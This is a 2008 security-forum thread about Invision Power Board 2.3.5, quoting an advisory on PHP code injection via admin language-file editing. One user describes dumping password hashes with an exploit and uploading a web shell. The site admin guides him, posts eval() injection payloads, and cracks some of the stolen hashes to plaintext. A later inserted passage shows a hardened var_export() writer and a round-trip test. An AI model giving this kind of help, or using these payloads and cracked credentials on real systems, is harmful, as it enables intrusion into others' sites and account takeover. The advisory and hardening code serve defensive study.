Waraxe IT Security Portal  
some questions on ipb
Posted: Tue Sep 23, 2008 4:59 pm
king424 (Regular user)
Joined: Apr 03, 2008
Posts: 24

First: I used the ipb2.3.5 exp and got some hashes, but can't crack them~

Second: ipb2.3.5, how to upload a shell?

Thanks for your help!

Posted: Tue Sep 23, 2008 8:45 pm
waraxe (Site admin)
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory :)

http://acid-root.new.fr/?0:18

Posted: Wed Sep 24, 2008 6:05 am
king424 (Regular user)
Joined: Apr 03, 2008
Posts: 24

waraxe wrote:
Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory :)

http://acid-root.new.fr/?0:18


Thanks, waraxe. I uploaded the shell successfully~~ :D
But cracking these hashes failed :roll:

Posted: Wed Sep 24, 2008 7:55 am
martin1 (Regular user)
Joined: Sep 21, 2008
Posts: 17

Any chance one of you can gimme some advice with this? As the link you supplied doesn't work :?

Posted: Wed Sep 24, 2008 8:53 am
waraxe (Site admin)
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

martin1 wrote:
Any chance one of you can gimme some advice with this? As the link you supplied doesn't work :?


http://acid-root.new.fr/?0:18

Code:


       Title:   Invision Power Board <= 2.3.5
                Multiple Vulnerabilities and Security Bypass

      Vendor:   http://www.invisionpower.com/community/board/

    Advisory:   http://acid-root.new.fr/?0:18
      Author:   DarkFig < gmdarkfig (at) gmail (dot) com >

 Released on:   2008/08/29
   Changelog:   2008/08/30

     Summary:   Introduction
                Blind SQL Injection
                Insecure SQL Password Usage
                Admin Session Hijacking
                Deep Recursion Protection Bypass
                Code Execution
                Miscellaneous

  Risk level:   Medium / High


...
...

 VI - CODE EXECUTION

  The ACP allows admins to manage languages, they can
  choose the default language, import a new one, and edit
  them. Let's take a look in the file "sources/action_admin/
  languages.php":

   65| switch($this->ipsclass->input['code'])
   66| {
   ..|
   88|  case 'doedit':
   89|    $this->ipsclass->admin->cp_permission_check(...);
   90|    $this->save_langfile();
  110|  break;
  ...|
  935|    function save_langfile()
  936|    {
  ...|
  957|      $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir'].
  ...|                 "/".$this->ipsclass->input['lang_file'];
  958|
  959|      if (! file_exists( $lang_file ) )  ...
  ...|
  963|
  964|      if (! is_writeable( $lang_file ) ) ...
  ...|
  969|      $barney = array();
  970|       
  971|      foreach ($this->ipsclass->input as $k => $v)
  972|      {
  973|        if ( preg_match( "/^XX_(\S+)$/", $k, $match ) )
  974|        {
  975|          if ( isset($this->ipsclass->input[ $match[0] ]) )
  976|          {
  977|       $v = str_replace("'", "'", stripslashes($_POST[$match[0]]));
  978|       $v = str_replace("<", "<",  $v );
  979|       $v = str_replace(">", ">", $v );
  980|       $v = str_replace("&", "&", $v );
  981|       $v = str_replace("\r", "", $v );
  982|             
  983|       $barney[ $match[1] ] = $v;
  984|          }
  985|        }
  986|      }

  As you can see, there are several replacements which are
  made. Some HTML entities are converted to their applicable
  characters. The "stripslashes()" function is also called.
  But we don't really care about that, this will not cause
  a problem, this was just to show you how user's inputs
  are treated. Now let's see how the change is made:
 
   993|    $start = "<?php\n\n".'$lang = array('."\n";
   994|
   995|  foreach($barney as $key => $text)
   996|  {
   997|    $text   = preg_replace("/\n{1,}$/", "", $text);
   998|    $start .= "\n'".$key."'  => \"".str_replace( '"', '\"', $text)."\",";
   999|  }
  1000|       
  1001|  $start .= "\n\n);\n\n?".">";
  1002|
  1003|  if ($fh = fopen( $lang_file, 'w') )
  1004|  {
  1005|     fwrite($fh, $start );
  1006|     fclose($fh);
  1007|  }
 
  So, there's a protection against double quotes, not all
  escape characters. There are several ways to bypass this
  protection.

  The first method, is to play with what we call "dynamic
  variables". With two $, we can execute PHP code.
  Example: ${${@eval($_SERVER[HTTP_SH])}}

  The second one, is to use another escape character, a
  backslash (\) will do the stuff. The attacker must change
  two inputs. Example:

   First input: hello\
  Second input: ); @eval($_SERVER[HTTP_SH]); /*

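
The escaping gap described in the quoted advisory, as an added example that is not part of the original post, the advisory or IPB's code: a writer that escapes only double quotes before emitting a double-quoted PHP literal, next to a var_export()-based writer. The function names, the key allowlist and the sample strings are assumptions constructed for illustration.

```php
<?php
// Added illustration; function names are hypothetical, not IPB code.

// Weak form: mirrors the pattern in the excerpt, where only '"' is escaped
// before the value is placed inside a double-quoted PHP string literal.
function build_lang_weak(array $strings): string {
    $out = "<?php\n\n\$lang = array(\n";
    foreach ($strings as $key => $text) {
        $out .= "\n'" . $key . "'  => \"" . str_replace('"', '\"', $text) . "\",";
    }
    return $out . "\n\n);\n";
}

// Hardened form: var_export() emits single-quoted literals with backslashes
// and quotes escaped, so '$', '{' and '\' in a value stay plain data.
// Keys are restricted to an identifier-like allowlist (an assumption here).
function build_lang_safe(array $strings): string {
    $clean = [];
    foreach ($strings as $key => $text) {
        if (!preg_match('/^[A-Za-z0-9_]+$/', (string)$key)) {
            throw new InvalidArgumentException("bad language key: $key");
        }
        $clean[$key] = (string)$text;
    }
    return "<?php\n\n\$lang = " . var_export($clean, true) . ";\n";
}

// Load generated source from a temp file; a file that no longer parses
// is reported as null instead of aborting the script.
function load_lang(string $source): ?array {
    $file = tempnam(sys_get_temp_dir(), 'lang');
    file_put_contents($file, $source);
    try {
        $lang = null;
        include $file;          // $lang is set in this function's scope
        return $lang;
    } catch (ParseError $e) {
        return null;
    } finally {
        unlink($file);
    }
}

// Constructed, benign inputs: a '$' sequence and a trailing backslash.
$sample = ['greeting' => 'Hello $user', 'bye' => 'see you\\'];
// Compare what each generated file loads back as against the original input.
var_dump(load_lang(build_lang_safe($sample)) === $sample);
var_dump(load_lang(build_lang_weak($sample)) === $sample);
```

A round-trip comparison like this is a usable regression check for any code that generates PHP source from user-editable strings: stored values must load back byte-for-byte identical to what was submitted.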

Posted: Wed Sep 24, 2008 10:23 am
martin1 (Regular user)
Joined: Sep 21, 2008
Posts: 17

Thanks waraxe ;)

Posted: Wed Sep 24, 2008 12:32 pm
waraxe (Site admin)
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Plaintext of 4d1c98ad4b31e1518d0c9036d1922b41 is forever
Plaintext of 44352b5a1741ec1c382f0aa77f7cdb8e is mugello
Plaintext of 06e5fdb9d0b1378cc5b863d3abcb29be is brabak


:)

Posted: Thu Sep 25, 2008 5:36 am
king424 (Regular user)
Joined: Apr 03, 2008
Posts: 24

Thanks again! :lol:
Can anyone crack any of the others?

Posted: Fri Sep 26, 2008 7:08 am
donkey (Regular user)
Joined: Sep 26, 2008
Posts: 11

How did you get the salt of that thing?
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"